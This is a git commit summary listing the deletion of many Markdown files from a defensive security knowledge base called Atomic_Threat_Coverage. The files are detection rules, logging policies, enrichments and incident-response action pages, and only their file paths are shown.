 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_add_domain_trust.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_add_sid_history.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_backup_delete.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_bcdedit.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_bginfo.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_calc.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_cdb.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_certutil_command.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_certutil_encode.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_cli_escape.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_cmd_http_appdata.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_codeintegrity_check_failure.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_codepage_switch.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_commands_recon_activity.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_compression_params.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_comsvcs_procdump.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_control_dll_load.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_copy_lateral_movement.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_copy_system32.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_covenant.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_crackmapexec_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_crackmapexec_powershell_obfuscation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_csc.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_csc_folder.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_download.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_fileupload.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_start_combo.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_dctask64_proc_inject.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_desktopimgdownldr.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_devtoolslauncher.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_dhcp_config.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_dhcp_config_failed.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_direct_asep_reg_keys_modification.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_disable_ie_features.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_ditsnap.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_dns_config.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_dnx.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_double_extension.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_dsrm_password_change.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_dxcap.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_eventlog_clear.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_eventlog_cleared.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_exec_folder.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_execution_path.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_execution_path_webserver.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_explorer_break_proctree.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logon_reasons.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logon_source.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logons_single_source.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_file_characteristics.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_findstr_lnk.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_firewall_disable.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_fsutil_usage.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_gup.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_interactive_logons.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_iss_module_install.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_kerberos_manipulation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_ldap_dataexchange.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_local_anon_logon_created.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_lsass_dump.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_lsass_dump_generic.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_mshta_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_msiexec_cwd.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_msiexec_web_install.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_msmpeng_crash.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_msoffice.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_net_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_net_recon_activity.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_netsh_dll_persistence.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_ntdsutil.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_ntlm_auth.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_ntlm_rdp.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_odbcconf.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_openwith.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_outlook.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_outlook_temp.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_ping_hex_ip.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_empire_launch.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_empire_uac_bypass.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_enc_cmd.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_hidden_b64_cmd.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_parent_combo.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_parent_process.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_procdump.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_process_creations.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_prog_location_process_starts.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_ps_appdata.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_ps_downloadfile.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_psexec.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_psr_capture_screenshots.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_raccess_sensitive_fext.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_rar_flags.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_rasdial_activity.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_rc4_kerberos.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_recon_activity.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_regsvr32_anomalies.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_renamed_dctask64.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_renamed_debugview.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_rottenpotato.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_run_locations.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_rundll32_activity.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_rundll32_by_ordinal.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_sam_dump.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_samr_pwset.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_schtask_creation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_script_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_sdelete.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_security_eventlog_cleared.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_service_path_modification.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_squirrel_lolbin.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_sysprep_appdata.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_sysvol_access.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_taskmgr_localsystem.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_taskmgr_parent.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_time_modification.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_tscon_localsystem.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_tscon_rdp_redirect.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_use_of_csharp_console.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_userinit_child.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_whoami.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_wmi_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_susp_wmi_login.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_suspicious_outbound_kerberos_connection.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_svcctl_remote_service.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_syskey_registry_access.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_tap_driver_installation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_tap_installer_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_task_folder_evasion.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_termserv_proc_spawn.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_tool_psexec.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_transferring_files_with_credential_data_via_network_shares.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_trust_discovery.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_uac_cmstp.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_uac_fodhelper.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_uac_wsreset.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_usb_device_plugged.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_user_added_to_local_administrators.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_user_creation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_user_driver_loaded.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_using_sc_to_change_sevice_image_path_by_non_admin.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_vul_cve_2020_0688.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_vul_java_remote_debugging.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_webshell_detection.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_webshell_spawn.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_whoami_as_system.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_win10_sched_task_0day.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_wmi_backdoor_exchange_transport_agent.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_wmi_persistence.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_wmi_persistence_script_event_consumer.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_wmi_spwns_powershell.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_wmiprvse_spawning_process.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_workflow_compiler.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_wsreset_uac_bypass.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_xsl_script_processing.md
 delete mode 100644 Atomic_Threat_Coverage/Enrichments/EN0001_cache_sysmon_event_id_1_info.md
 delete mode 100644 Atomic_Threat_Coverage/Enrichments/EN0002_enrich_sysmon_event_id_1_with_parent_info.md
 delete mode 100644 Atomic_Threat_Coverage/Enrichments/EN0003_enrich_other_sysmon_events_with_event_id_1_data.md
 delete mode 100644 Atomic_Threat_Coverage/Enrichments/EN0004_enrich_sysmon_event_id_11_with_TargetFilePathFingerprint.md
 delete mode 100644 Atomic_Threat_Coverage/Enrichments/EN0005_cache_TargetFilePathFingerprint_from_enriched_sysmon_event_id_11.md
 delete mode 100644 Atomic_Threat_Coverage/Hardening_Policies/HP_0001_windows_LocalAccountTokenFilterPolicy.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0001_windows_audit_process_creation.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0002_windows_audit_process_creation_with_commandline.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0003_windows_sysmon_process_creation.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0004_windows_audit_logon.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0005_windows_sysmon_network_connection.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0006_windows_sysmon_image_loaded.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0007_windows_sysmon_ProcessAccess.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0008_windows_sysmon_FileCreate.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0009_windows_sysmon_PipeEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0010_windows_sysmon_WmiEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0011_windows_sysmon_DnsQuery.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0025_windows_audit_directory_service_changes.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0026_windows_audit_user_account_management.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0027_windows_audit_directory_service_access.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0028_windows_audit_sam.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0029_windows_audit_detailed_file_share.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0030_windows_audit_file_share.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0031_linux_auditd_execve.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0032_linux_auditd_read_access_to_file.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0033_linux_auditd_syscall.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0034_linux_named_client_security_log.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0037_windows_audit_audit_policy_change.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0038_windows_audit_kerberos_authentication_service.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0039_windows_audit_kernel_object.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0041_windows_audit_other_object_access_events.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0042_windows_audit_handle_manipulation.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0044_windows_ntlm_audit.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0045_windows_audit_filtering_platform_connection.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0046_windows_audit_security_state_change.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0047_BIND_DNS_queries.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0048_Passive_DNS_logging.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0100_windows_audit_security_system_extension.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0101_windows_audit_security_group_management.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0102_windows_audit_file_system.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0103_windows_audit_registry.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0104_windows_audit_removable_storage.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0105_windows_audit_authorization_policy_change.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0106_windows_audit_kerberos_service_ticket_operations.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0107_windows_audit_credential_validation.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0108_windows_powershell_module_logging.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0109_windows_powershell_script_block_log.md
 delete mode 100644 Atomic_Threat_Coverage/Logging_Policies/LP0110_windows_powershell_transcript.md
 delete mode 100644 Atomic_Threat_Coverage/Mitigation_Policies/MP_0001_windows_asr_block_credential_stealing_from_lsass.md
 delete mode 100644 Atomic_Threat_Coverage/Mitigation_Systems/MS_0001_microsoft_defender_advanced_threat_protection.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1001_practice.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1002_take_trainings.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1003_raise_personnel_awareness.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1004_make_personnel_report_suspicious_activity.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1005_set_up_relevant_data_collection.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1006_set_up_a_centralized_long-term_log_storage.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1007_develop_communication_map.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1008_make_sure_there_are_backups.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1009_get_network_architecture_map.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1010_get_access_control_matrix.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1011_develop_assets_knowledge_base.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1012_check_analysis_toolset.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1013_access_vulnerability_management_system_logs.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1014_connect_with_trusted_communities.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1101_access_external_network_flow_logs.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1102_access_internal_network_flow_logs.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1103_access_internal_http_logs.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1104_access_external_http_logs.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1105_access_internal_dns_logs.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1106_access_external_dns_logs.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1107_access_vpn_logs.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1108_access_dhcp_logs.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1109_access_internal_packet_capture_data.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1110_access_external_packet_capture_data.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1111_get_ability_to_block_external_ip_address.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1112_get_ability_to_block_internal_ip_address.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1113_get_ability_to_block_external_domain.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1114_get_ability_to_block_internal_domain.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1115_get_ability_to_block_external_url.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1116_get_ability_to_block_internal_url.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1117_get_ability_to_block_port_external_communication.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1118_get_ability_to_block_port_internal_communication.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1119_get_ability_to_block_user_external_communication.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1120_get_ability_to_block_user_internal_communication.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1121_get_ability_to_find_data_transferred_by_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1122_get_ability_to_block_data_transferring_by_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1123_get_ability_to_list_data_transferred.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1124_get_ability_to_collect_transferred_data.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1125_get_ability_to_identify_transferred_data.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1126_find_data_transferred_by_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1201_get_ability_to_list_users_opened_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1202_get_ability_to_list_email_message_receivers.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1203_get_ability_to_block_email_domain.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1204_get_ability_to_block_email_sender.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1205_get_ability_to_delete_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1206_get_ability_to_quarantine_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1207_get_ability_to_collect_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1301_get_ability_to_list_files_created.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1302_get_ability_to_list_files_modified.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1303_get_ability_to_list_files_deleted.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1304_get_ability_to_list_files_downloaded.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1305_get_ability_to_list_files_with_tampered_timestamps.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1306_get_ability_to_find_file_by_path.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1307_get_ability_to_find_file_by_metadata.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1308_get_ability_to_find_file_by_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1309_get_ability_to_find_file_by_format.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1310_get_ability_to_find_file_by_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1311_get_ability_to_collect_file.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1312_get_ability_to_quarantine_file_by_path.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1313_get_ability_to_quarantine_file_by_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1314_get_ability_to_quarantine_file_by_format.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1315_get_ability_to_quarantine_file_by_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1316_get_ability_to_remove_file.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1317_get_ability_to_analyse_file_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1318_get_ability_to_analyse_windows_pe.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1319_get_ability_to_analyse_macos_macho.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1320_get_ability_to_analyse_unix_elf.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1321_get_ability_to_analyse_ms_office_file.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1322_get_ability_to_analyse_pdf_file.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1323_get_ability_to_analyse_script.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1401_get_ability_to_list_processes_executed.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1402_get_ability_to_find_process_by_executable_path.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1403_get_ability_to_find_process_by_executable_metadata.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1404_get_ability_to_find_process_by_executable_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1405_get_ability_to_find_process_by_executable_format.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1406_get_ability_to_find_process_by_executable_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1407_get_ability_to_block_process_by_executable_path.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1408_get_ability_to_block_process_by_executable_metadata.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1409_get_ability_to_block_process_by_executable_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1410_get_ability_to_block_process_by_executable_format.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1411_get_ability_to_block_process_by_executable_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1501_manage_remote_computer_management_system_policies.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1502_get_ability_to_list_registry_keys_modified.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1503_get_ability_to_list_registry_keys_deleted.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1504_get_ability_to_list_registry_keys_accessed.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1505_get_ability_to_list_registry_keys_created.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1506_get_ability_to_list_services_created.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1507_get_ability_to_list_services_modified.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1508_get_ability_to_list_services_deleted.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1509_get_ability_to_remove_registry_key.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1510_get_ability_to_remove_service.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1601_manage_identity_management_system.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1602_get_ability_to_lock_user_account.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1603_get_ability_to_list_users_authenticated.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1604_get_ability_to_revoke_authentication_credentials.md
